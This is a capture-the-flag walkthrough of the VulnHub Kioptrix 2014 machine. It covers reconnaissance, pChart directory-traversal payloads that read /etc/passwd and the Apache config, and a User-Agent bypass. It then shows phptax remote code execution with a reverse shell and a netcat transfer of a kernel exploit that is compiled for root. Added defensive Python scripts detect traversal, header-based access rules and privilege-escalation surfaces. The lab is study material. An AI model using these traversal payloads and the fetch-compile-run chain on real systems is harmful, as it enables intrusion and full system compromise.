
VulnHub: Kioptrix: 2014

Link: https://www.vulnhub.com/entry/kioptrix-2014-5,62/

1. Network Discovery

nmap -sn 10.0.2.24/24

The target IP is 10.0.2.20.

2. Port scan

nmap -Pn 10.0.2.20

There’re 2 open ports: 80 and 8080.

3. OS and service scan

nmap -A -p22,80,8080 10.0.2.20

There’re HTTP sites on both ports.

4. Vuln scan

nmap --script vuln -p22,80,8080 10.0.2.20

Couldn't find any more useful information.

5. Nikto scan

Port 80

nikto -h http://10.0.2.20

This system may be vulnerable to a remote buffer overflow.

Port 8080

nikto -h http://10.0.2.20:8080

The result was similar to port 80’s.

6. Directory scan

Port 80

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.20/ -x php,txt,html,sh,cgi -q

/index.html

Port 8080

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.20:8080/ -x php,txt,html,sh,cgi -q

I got a 403 return code.

7. Exploit w/ mod_ssl

I came across this script:

heltonWernik/OpenLuck (github.com): "Original is OpenFu*&%$#, I change for something more elegant This Exploit (https://www.exploit-db.com/exploits/764/)…"

From previous Nikto scan:

Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8

This script has no entry for this version, so I'll have to try another way.

8. Accessing HTTP site

Start w/ port 80

View page source -> pChart2.1.3

Accessing port 8080

Viewing page source showed nothing

Back to port 80, I googled pChart2.1.3 and came across the exploit-db entry:

Offensive Security's Exploit Database Archive (www.exploit-db.com): "Exploit Title: pChart 2.1.3 Directory Traversal and Reflected XSS # Date: 2014-01-24 # Exploit Author: Balazs Makany #…"

Starting w/ Directory Traversal

Access pChart, intercept the request w/ Burp Suite, and send it to the Repeater:

http://10.0.2.20/pChart2.1.3/examples/index.php

Test the exploit:

/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/shadow

I don’t have permission to view this.
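From the server side, the two requests above are what an Apache access log records. The following is an added example, not code from the original write-up, that scans constructed Apache access-log lines for directory traversal in the request target (the pChart Script parameter included), percent-decoding repeatedly so double-encoded variants are caught as well. The log lines, client address, timestamps and statuses are constructed for the demo.

```python
import re
from urllib.parse import unquote

# Constructed sample Apache access-log lines (not from the original write-up);
# the client address, timestamps, sizes and status codes are made up.
SAMPLE_LOG = """\
10.0.2.7 - - [12/Mar/2020:10:00:01 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=Example/example.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
10.0.2.7 - - [12/Mar/2020:10:00:05 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.2.7 - - [12/Mar/2020:10:00:09 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%252f..%252f..%252fetc/shadow HTTP/1.1" 403 512 "-" "Mozilla/5.0"
10.0.2.7 - - [12/Mar/2020:10:00:12 +0000] "GET /index.html HTTP/1.1" 200 300 "-" "curl/7.68.0"
"""

# Pull method, request target and status out of a combined-log-format line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"\s+(?P<status>\d{3})')
# A parent-directory hop anywhere in the decoded target ("../" or "/..").
TRAVERSAL_RE = re.compile(r'\.\./|/\.\.')


def decode_fully(value, max_rounds=3):
    """Percent-decode until the string stops changing, so %252f (double-encoded '/') is seen as '/'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(target):
    """True if the request target contains a '..' path hop after full decoding."""
    return TRAVERSAL_RE.search(decode_fully(target)) is not None


def scan_log(text):
    """Return (line_no, status, decoded_target) for every request that looks like traversal.

    The status is kept because a 200 on a flagged request means the file was
    served, which is exactly what the /etc/passwd read above looks like.
    """
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        if is_traversal(m.group("target")):
            hits.append((n, int(m.group("status")), decode_fully(m.group("target"))))
    return hits


if __name__ == "__main__":
    for line_no, status, target in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: HTTP {status} {target}")
```

Matching on the decoded target rather than the raw one is the point: a filter that only looks for a literal "../" misses the %2f-encoded form used above and the double-encoded form entirely. Backslash-encoded and overlong UTF-8 variants are not covered by this regex and would need the same decode-then-normalise treatment.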

Back to the site on port 8080, I suspected that it returned a forbidden status (403) because I didn't have the right User-Agent.

The User-Agent configuration is located in Apache's config file:

/usr/local/etc/apache22/httpd.conf

Let's try reading it w/ the traversal exploit.

Success!!!

After reading through the file, I found that the allowed user-agent was set to Mozilla 4.0.

I used this list of agents:

Link: https://gist.github.com/pzb/b4b6f57144aea7827ae4

I used the agent-switcher plugin w/ Firefox, and I could access the site.
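The 403 on port 8080 was produced by an access rule keyed on the User-Agent header, a value the client chooses, so it is a filter rather than an authentication boundary. The following is an added example, not code from the write-up or from the VM: it audits a constructed httpd.conf fragment for that pattern, a SetEnvIf on a request header feeding Allow from env= (Apache 2.2) or Require env (Apache 2.4). The fragment is an assumption modelled on the behaviour described above, not the target's actual file, and it also contains a Basic-auth block that the audit correctly leaves alone.

```python
import re

# Constructed httpd.conf fragment (an assumption modelled on the described
# behaviour, not the target's real file). Port 8080 is gated on User-Agent;
# the second block uses real authentication and should not be flagged.
SAMPLE_CONF = """\
<VirtualHost *:8080>
    DocumentRoot "/usr/local/www/apache22/data2"
    <Directory "/usr/local/www/apache22/data2">
        SetEnvIf User-Agent "Mozilla/4.0" allowed_browser
        Order Deny,Allow
        Deny from all
        Allow from env=allowed_browser
    </Directory>
</VirtualHost>
<Directory "/usr/local/www/apache22/admin">
    AuthType Basic
    AuthName "Admin"
    AuthUserFile /usr/local/etc/apache22/.htpasswd
    Require valid-user
</Directory>
"""

# SetEnvIf[NoCase] <attribute> <regex> <envvar>
SETENVIF_RE = re.compile(
    r'^\s*SetEnvIf(?:NoCase)?\s+(?P<attr>\S+)\s+(?P<pattern>"[^"]*"|\S+)\s+(?P<var>[A-Za-z_][\w-]*)', re.I)
# Apache 2.2 style: Allow/Deny from env=var   Apache 2.4 style: Require [not] env var
ALLOW_ENV_RE = re.compile(r'^\s*(?:Allow|Deny)\s+from\s+env=!?(?P<var>[\w-]+)', re.I)
REQUIRE_ENV_RE = re.compile(r'^\s*Require\s+(?:not\s+)?env\s+(?P<var>[\w-]+)', re.I)

# SetEnvIf attributes that come from the connection rather than the request.
# Everything else (User-Agent, Referer, any header name) is sent by the client.
CONNECTION_ATTRS = {"remote_addr", "remote_host", "server_addr"}


def audit_config(text):
    """Return (line_no, envvar, attribute) for access rules that depend on a client-supplied header."""
    lines = text.splitlines()
    env_sources = {}
    for line in lines:
        m = SETENVIF_RE.match(line)
        if m:
            env_sources[m.group("var")] = m.group("attr")

    findings = []
    for n, line in enumerate(lines, 1):
        m = ALLOW_ENV_RE.match(line) or REQUIRE_ENV_RE.match(line)
        if not m:
            continue
        attr = env_sources.get(m.group("var"))
        if attr and attr.lower() not in CONNECTION_ATTRS:
            findings.append((n, m.group("var"), attr))
    return findings


if __name__ == "__main__":
    for line_no, var, attr in audit_config(SAMPLE_CONF):
        print(f"line {line_no}: access decision uses env '{var}' derived from client header {attr}")
```

A rule keyed on Remote_Addr is not reported, since that value comes from the connection; a rule keyed on User-Agent or any other request header is, because the header travels in the request the client writes.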

It’s phptax.

Viewing the page source revealed nothing.

Googling phptax exploit:

Offensive Security's Exploit Database Archive (www.exploit-db.com): "phptax 0.8 - Remote Code Execution. CVE-86992 . webapps exploit for PHP platform"

I set up a listener for the reverse shell on port 1234, using a payload from:

swisskyrepo/PayloadsAllTheThings (github.com): "A list of useful payloads and bypass for Web Application Security and Pentest/CTF"

I succeeded using this.

Edit the IP and URL-encode it w/ Burp Suite.

Modified exploit string w/ the encoded reverse shell command.

Paste it into the browser; now I have a shell.

9. Privilege escalation

Verify user

whoami

Searching for passwords in:

/home, /tmp, /var/mail, /var/log

I couldn't find any usernames or passwords

Verify /etc/passwd permission

Verify /etc/shadow permission

Verify sudo

sudo -l

Verify SUID

find / -perm -u=s -type f 2>/dev/null

Nothing that I can use.

Verify capabilities

getcap -r / 2>/dev/null

Verify cron

cat /etc/crontab

Nothing that I can use.
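The sudo, SUID, capabilities and cron checks above are the same surfaces a defender audits on a host. The following is an added example, not code from the write-up: it reads constructed copies of the outputs those commands produce (find -perm -u=s, getcap -r, /etc/crontab) and flags a SUID binary outside a known baseline, a file capability that grants file-read or privilege bypass, and a cron job running a script from a world-writable directory. The sample outputs, the baseline set and the paths in them are constructed for the demo.

```python
import re

# Constructed sample outputs (not taken from the target); they stand in for
# what `find / -perm -u=s -type f`, `getcap -r /` and `cat /etc/crontab` print.
SUID_LIST = """\
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su
/tmp/priv
"""
GETCAP_OUT = """\
/usr/bin/ping = cap_net_raw+ep
/usr/local/bin/backup = cap_dac_read_search+ep
"""
CRONTAB = """\
# /etc/crontab
SHELL=/bin/sh
*/5 * * * * root /usr/local/bin/cleanup.sh
0 3 * * * root /tmp/nightly.sh
"""

# Constructed baseline of SUID binaries expected on this host (assumption).
SUID_BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su"}
# Capabilities that let a process read arbitrary files or change identity.
RISKY_CAPS = {"cap_dac_read_search", "cap_dac_override", "cap_setuid",
              "cap_setgid", "cap_sys_admin", "cap_sys_ptrace"}
# Directories any local user can write to.
UNTRUSTED_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def unexpected_suid(listing):
    """SUID files from a `find -perm -u=s` listing that are not in the baseline."""
    return sorted(p for p in listing.split() if p not in SUID_BASELINE)


def risky_capabilities(output):
    """(path, [caps]) for getcap lines that carry a capability from RISKY_CAPS."""
    hits = []
    for line in output.splitlines():
        if " = " not in line:
            continue
        path, caps = line.split(" = ", 1)
        # Each entry looks like cap_x+ep or cap_x,cap_y=eip; keep only the names.
        names = {c.split("+")[0].split("=")[0] for c in caps.split(",")}
        bad = sorted(names & RISKY_CAPS)
        if bad:
            hits.append((path.strip(), bad))
    return hits


# System crontab: five time fields, a user, then the command.
CRON_RE = re.compile(r'^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$')


def cron_from_untrusted_dirs(crontab):
    """(user, program) for jobs whose program lives in a world-writable directory."""
    hits = []
    for line in crontab.splitlines():
        if not line.strip() or line.lstrip().startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment or VAR=value line
        m = CRON_RE.match(line)
        if not m:
            continue
        program = m.group("cmd").split()[0]
        if program.startswith(UNTRUSTED_DIRS):
            hits.append((m.group("user"), program))
    return hits


if __name__ == "__main__":
    print("unexpected SUID:", unexpected_suid(SUID_LIST))
    print("risky caps:", risky_capabilities(GETCAP_OUT))
    print("cron from untrusted dirs:", cron_from_untrusted_dirs(CRONTAB))
```

The SUID check only works against a baseline recorded when the host was known-good, which is what makes a compiled binary appearing in /tmp with the SUID bit stand out; the cron check catches the common misconfiguration of root running a script from a directory where any user can replace it.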

Verify kernel

uname -a

Googling, I found 3 scripts.

I tried the first script:

searchsploit -m 28718

Prepare an HTTP server on the attacker machine:

python -m SimpleHTTPServer 80

Prepare to store it in /tmp on the target machine:

cd /tmp

I don't have a get command.

I'll retrieve it w/ netcat instead.

On the attacker machine:

nc -nvlp 1337 < 28718.c

On the target machine:

nc -nv 10.0.2.7 1337 > priv.c

Compile:

gcc priv.c -o priv

Run the compiled exploit:

./priv

Now I’m root.

cd /root

cat congrats.txt

ratiros01

Mar 12
